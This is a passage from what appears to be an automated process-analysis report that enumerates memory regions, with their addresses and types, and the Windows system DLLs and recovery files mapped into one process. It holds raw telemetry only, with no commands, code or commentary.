"private_0x00000000036e0000" filename = "" Region: id = 296 start_va = 0x37e0000 end_va = 0x37e0fff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 297 start_va = 0x37f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 298 start_va = 0x3800000 end_va = 0x3800fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 299 start_va = 0x3810000 end_va = 0x3810fff entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 300 start_va = 0x3820000 end_va = 0x3820fff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 301 start_va = 0x3830000 end_va = 0x3830fff entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 302 start_va = 0x3840000 end_va = 0x3840fff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 303 start_va = 0x3850000 end_va = 0x388ffff entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 304 start_va = 0x3890000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 305 start_va = 0x3990000 end_va = 0x3990fff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 306 start_va = 0x39a0000 end_va = 0x39a0fff entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 307 start_va = 0x39b0000 end_va = 0x39b0fff entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 308 start_va = 0x39c0000 end_va = 0x39c0fff entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 309 start_va = 0x39d0000 end_va = 0x39d0fff entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 310 start_va = 0x39e0000 end_va = 0x39e0fff entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 311 start_va = 0x39f0000 end_va = 0x39f0fff entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 312 start_va = 0x3a00000 end_va = 0x3a00fff entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 313 start_va = 0x3a10000 end_va = 0x3a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 314 start_va = 0x3a50000 end_va = 0x3b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 315 start_va = 0x3b50000 end_va = 0x3b50fff entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 316 start_va = 0x3b60000 end_va = 0x3b60fff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 317 start_va = 0x3b70000 end_va = 0x3b70fff entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 318 start_va = 0x3b80000 end_va = 0x3b80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 319 start_va = 0x3b90000 end_va = 0x3b90fff entry_point = 0x0 region_type = private name = "private_0x0000000003b90000" filename = "" Region: id = 320 start_va = 0x3ba0000 end_va = 0x3ba0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 321 start_va = 0x3bb0000 end_va = 0x3bb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 322 start_va = 0x3bc0000 end_va = 0x3bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 323 start_va = 0x3bd0000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 324 start_va = 0x3c10000 end_va = 0x3d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 325 start_va = 0x3d10000 end_va = 0x3d10fff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 326 start_va = 0x3d20000 end_va = 0x3d20fff entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 327 start_va = 0x3d30000 end_va = 0x3d30fff entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 328 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 329 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 330 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 331 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 332 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 333 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 334 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 335 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 336 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 337 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 338 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 339 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 340 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 341 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 342 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 343 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 344 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 345 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 346 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 347 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 348 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 349 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 350 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 351 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 352 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 353 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 354 start_va = 0x3d50000 end_va = 0x3e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 355 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 356 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 357 start_va = 0x74ac0000 end_va = 0x74b10fff entry_point = 0x74ac0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 358 start_va = 0x3fc0000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 359 start_va = 0x76b30000 end_va = 0x76b3bfff entry_point = 0x76b30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 360 start_va = 0x76b40000 end_va = 0x76c5cfff entry_point = 0x76b40000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 361 start_va = 0x74c90000 end_va = 0x74ca1fff entry_point = 0x74c90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 362 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 363 start_va = 0x3e90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 364 start_va = 0x74a70000 end_va = 0x74abbfff entry_point = 0x74a70000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 365 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 366 start_va = 0x73fb0000 end_va = 0x73febfff entry_point = 0x73fb0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 367 start_va = 0x73ff0000 end_va = 0x74a6ffff entry_point = 0x73ff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 368 start_va = 0x75420000 end_va = 0x75424fff entry_point = 0x75420000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 369 start_va = 0x75440000 end_va = 0x7563afff entry_point = 0x75440000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 370 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x3d40000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 371 start_va = 0x3f90000 end_va = 0x3f91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f90000" filename = "" Region: id = 372 start_va = 0x76530000 end_va = 0x76624fff entry_point = 0x76530000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 373 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 374 start_va = 0x74ff0000 end_va = 0x74ffafff entry_point = 0x74ff0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1503 start_va = 0x3fa0000 end_va = 0x3fa3fff entry_point = 0x3fa0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1504 start_va = 0x3fb0000 end_va = 0x3fb3fff entry_point = 0x3fb0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1505 start_va = 0x3fd0000 end_va = 0x3ffffff entry_point = 0x3fd0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 1506 start_va = 0x4000000 end_va = 0x4065fff entry_point = 0x4000000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1507 start_va = 0x4070000 end_va = 0x4070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1508 start_va = 0x41c0000 end_va = 0x41c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041c0000" filename = "" Region: id = 1509 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1510 start_va = 0x3e90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1511 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1512 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1513 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1514 start_va = 0x73f90000 end_va = 0x73fa6fff entry_point = 0x73f90000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1515 start_va = 0x41d0000 end_va = 0x44acfff entry_point = 0x41d0000 region_type = mapped_file name = "boot.sdi" filename = "\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") Region: id = 1516 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1517 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1518 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 1519 start_va = 0x44b0000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 1520 start_va = 0x45b0000 end_va = 0x488cfff entry_point = 0x45b0000 region_type = mapped_file name = "winre.wim" filename = "\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim") Region: id = 1521 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1522 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1523 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 1524 start_va = 0x4100000 end_va = 0x413ffff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1525 start_va = 0x4140000 end_va = 0x4140fff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 1526 start_va = 0x4890000 end_va = 0x498ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 1527 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 1528 start_va = 0x4150000 end_va = 0x4150fff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 1529 start_va = 0x4160000 end_va = 0x419ffff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 1530 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1531 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 1532 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1533 start_va = 0x3e90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1534 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1535 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1536 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1537 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1538 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1539 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1540 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1541 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 1542 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1543 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1544 start_va = 0x4100000 end_va = 0x413ffff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1545 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1546 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 1547 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1548 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1549 start_va = 0x3e70000 end_va = 0x3eaffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1550 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1551 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1552 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1553 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1554 start_va = 0x3ed0000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1555 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1556 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1557 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1558 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1559 start_va = 0x3e70000 end_va = 0x3eaffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1560 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1561 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1562 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1563 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1564 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1565 start_va = 0x3e90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1566 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1567 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1568 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 1569 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1570 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1571 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1572 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1573 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1574 start_va = 0x3e90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1575 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1576 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1577 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1578 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1579 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1580 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1581 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1582 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1583 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1584 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1585 start_va = 0x4090000 end_va = 0x4090fff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1586 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 1587 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1588 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1589 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1590 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1591 start_va = 0x3e70000 end_va = 0x3eaffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1592 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1593 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1594 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1595 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1596 start_va = 0x3ed0000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1597 start_va = 0x43d0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 1598 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 1599 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1600 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1601 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1602 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1603 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1604 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1605 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1606 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1607 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1608 start_va = 0x3f10000 end_va = 0x3f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 1609 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1610 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 1611 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1612 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1613 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1614 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1615 start_va = 0x3ed0000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1616 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1617 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1618 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1619 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1620 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1621 start_va = 0x42d0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1622 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 1623 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = 